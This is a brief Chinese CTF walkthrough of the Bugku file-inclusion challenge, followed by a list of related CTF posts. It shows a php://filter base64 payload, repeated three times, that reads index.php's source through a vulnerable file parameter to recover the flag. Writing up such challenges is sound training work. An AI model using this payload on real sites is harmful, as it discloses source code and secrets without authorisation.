bugku--文件包含

点击

访问一下index.php

页面报错

既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

相关推荐
kali-Myon4 小时前
2025春秋杯网络安全联赛冬季赛-day2
python·安全·web安全·ai·php·pwn·ctf
kali-Myon6 小时前
2025春秋杯网络安全联赛冬季赛-day3
python·安全·web安全·ai·php·web·ctf
23zhgjx-zgx6 小时前
USB 设备通信数据包审计与键值解析报告
网络·ctf·流量
子木鑫6 天前
CTF命令注入
计算机网络·ctf
one____dream7 天前
【网安】Reverse-非常规题目
linux·python·安全·网络安全·ctf
one____dream7 天前
Reverse-elrond32
安全·网络安全·ctf
运筹vivo@9 天前
BUUCTF: [BSidesCF 2020]Had a bad day
web安全·ctf
三七吃山漆9 天前
[网鼎杯 2020 朱雀组]phpweb
php·ctf·网鼎杯
unable code9 天前
磁盘取证-Flying_High
网络安全·ctf·misc·1024程序员节·磁盘取证
运筹vivo@9 天前
BUUCTF : [RoarCTF 2019]Easy Java
java·web安全·ctf